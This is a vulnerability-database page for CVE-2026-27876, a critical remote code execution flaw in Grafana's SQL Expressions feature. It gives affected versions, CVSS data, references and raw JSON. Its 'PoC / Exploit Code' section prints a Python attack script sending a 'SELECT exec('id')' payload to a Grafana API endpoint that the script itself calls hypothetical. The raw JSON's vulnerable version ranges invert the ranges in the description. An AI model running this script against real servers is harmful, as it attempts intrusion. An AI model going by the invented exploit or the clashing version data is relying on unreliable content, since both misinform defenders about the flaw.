CVE-2026-27876

Description

A chained attack via SQL Expressions and a Grafana Enterprise plugin can lead to a remote arbitrary code execution impact (RCE). This is enabled by a feature in Grafana (OSS), so all users are always recommended to update to avoid future attack vectors going this path. Only instances with the sqlExpressions feature toggle enabled are vulnerable. Only instances in the following version ranges are affected: - 11.6.0 (inclusive) to 11.6.14 (exclusive): 11.6.14 has the fix. 11.5 and below are not affected. - 12.0.0 (inclusive) to 12.1.10 (exclusive): 12.1.10 has the fix. 12.0 did not receive an update, as it is end-of-life. - 12.2.0 (inclusive) to 12.2.8 (exclusive): 12.2.8 has the fix. - 12.3.0 (inclusive) to 12.3.6 (exclusive): 12.3.6 has the fix. - 12.4.0 (inclusive) to 12.4.2 (exclusive): 12.4.2 has the fix. 13.0.0 and above also have the fix: no v13 release is affected.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:* - VULNERABLE

Grafana 11.6.0 (含) 至 11.6.14 (不含)

Grafana 12.0.0 (含) 至 12.1.10 (不含)

Grafana 12.2.0 (含) 至 12.2.8 (不含)

Grafana 12.3.0 (含) 至 12.3.6 (不含)

Grafana 12.4.0 (含) 至 12.4.2 (不含)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import json

# This is a conceptual Proof of Concept (PoC) for CVE-2026-27876
# Actual exploitation requires a valid Grafana instance with 'sqlExpressions' enabled
# and a high-privileged user account.

TARGET_URL = "http://localhost:3000"
API_KEY = "YOUR_ADMIN_API_KEY"  # Requires High Privilege (PR:H)

headers = {
    "Authorization": f"Bearer {API_KEY}",
    "Content-Type": "application/json"
}

# Malicious payload targeting the SQL Expression feature
# This payload attempts to execute a command (e.g., id) via SQL injection chain
payload = {
    "queries": [
        {
            "refId": "A",
            "expr": "SELECT exec('id')",  # Conceptual SQL Expression payload
            "datasourceId": 1
        }
    ]
}

try:
    # Sending request to the vulnerable endpoint (hypothetical endpoint based on description)
    response = requests.post(f"{TARGET_URL}/api/datasources/proxy/1/query", headers=headers, json=payload)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check output for RCE indication.")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27876
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27876
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27876/
[4] VulDB https://vuldb.com/cve/CVE-2026-27876
[5] https://grafana.com/security/security-advisories/cve-2026-27876

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27876", "sourceIdentifier": "[email protected]", "published": "2026-03-27T15:16:50.920", "lastModified": "2026-04-02T16:16:21.140", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A chained attack via SQL Expressions and a Grafana Enterprise plugin can lead to a remote arbitrary code execution impact (RCE). This is enabled by a feature in Grafana (OSS), so all users are always recommended to update to avoid future attack vectors going this path.\n\nOnly instances with the sqlExpressions feature toggle enabled are vulnerable.\n\nOnly instances in the following version ranges are affected:\n\n- 11.6.0 (inclusive) to 11.6.14 (exclusive): 11.6.14 has the fix. 11.5 and below are not affected.\n- 12.0.0 (inclusive) to 12.1.10 (exclusive): 12.1.10 has the fix. 12.0 did not receive an update, as it is end-of-life.\n- 12.2.0 (inclusive) to 12.2.8 (exclusive): 12.2.8 has the fix.\n- 12.3.0 (inclusive) to 12.3.6 (exclusive): 12.3.6 has the fix.\n- 12.4.0 (inclusive) to 12.4.2 (exclusive): 12.4.2 has the fix. 13.0.0 and above also have the fix: no v13 release is affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionEndExcluding": "11.6.0", "matchCriteriaId": "2B1C33F0-5D24-493C-BD5E-78C4B79DEC58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "11.6.14", "versionEndExcluding": "12.0.0", "matchCriteriaId": "94F2B4A1-DE4B-4718-A4D2-FBAE0711CC94"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "12.1.10", "versionEndExcluding": "12.2.0", "matchCriteriaId": "B77BDF7D-60F5-4DA0-B530-D8B69B7BA9B7"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "12.2.8", "versionEndExcluding": "12.3.0", "matchCriteriaId": "03B82BEE-3BE4-466C-B50D-900DDD46277A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:enterprise:*:*:*", "versionStartIncluding": "12.3.6", "versionEndExcluding": "12.4.0", "matchCriteriaId": "84C9E335-11FD-45E6-8804-2392B0AE11F7"}]}]}], "references": [{"url": "https://grafana.com/security/security-advisories/cve-2026-27876", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}